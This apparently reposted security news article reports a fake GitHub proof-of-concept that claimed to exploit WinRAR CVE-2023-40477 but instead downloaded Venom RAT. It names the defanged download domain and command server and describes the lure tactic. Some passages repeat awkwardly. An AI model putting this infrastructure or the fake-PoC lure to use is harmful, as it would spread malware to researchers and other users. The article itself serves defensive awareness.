Locked Deceptive GitHub PoC Exploit Aims to Distribute Venom RAT Malware Under Guise of WinRAR Vulnerability

[dEEpEst]

A deceptive proof-of-concept (PoC) exploit was uploaded to GitHub by an attacker, intending to prey on users downloading the code by installing Venom RAT malware. The false PoC was initially reported to leverage a known WinRAR flaw, but in reality, it was based on a script that exploited a SQL injection issue in GeoServer software, identified as CVE-2023-25157, according to Robert Falcone from Palo Alto Networks Unit 42.

 

Fake PoCs are not new in targeting the cybersecurity research community, but it appears that the bad actors are also aiming at other criminals interested in integrating new vulnerabilities into their toolkit.

 

The GitHub account that hosted this misleading PoC, under the username whalersplonk, has been taken down. Records indicate that the PoC was uploaded on August 21, 2023, just a few days following the public disclosure of the WinRAR vulnerability, tagged as CVE-2023-40477. This specific WinRAR vulnerability, which could allow remote code execution on Windows systems, was patched last month with WinRAR version 6.23.

 

Cybersecurity whalersplonk, the GitHub account that hosted the repository, is no longer accessible. The PoC is said to have been committed on August 21, 2023, four days after the vulnerability was publicly announced.

 

CVE-2023-40477 relates to an improper validation issue in the WinRAR utility that could be exploited to achieve remote code execution (RCE) on Windows systems. It was addressed last month by the maintainers in version WinRAR 6.23, alongside another actively-exploited flaw tracked as CVE-2023-38831.

 

An analysis of the repository reveals a Python script and a Streamable video demonstrating how to use the exploit. The video attracted 121 views in total.

 

The Python script, as opposed to running the PoC, reaches out to a remote server (checkblacklistwords[.]eu) to fetch an executable named Windows.Gaming.Preview.exe, which is a variant of Venom RAT. It comes with capabilities to list running processes and receive commands from an actor-controlled server (94.156.253[.]109).

 

A closer examination of the attack infrastructure shows that the threat actor created the checkblacklistwords[.]eu domain at least 10 days prior to the public disclosure of the flaw, and then swiftly seized upon the criticality of the bug to attract potential victims.

 

 

"An unknown threat actor attempted to compromise individuals by releasing a fake PoC after the vulnerability's public announcement, to exploit an RCE vulnerability in a well-known application," Falcone said.

 

"This PoC is fake and does not exploit the WinRAR vulnerability, suggesting the actor tried to take advantage of a highly sought after RCE in WinRAR to compromise others."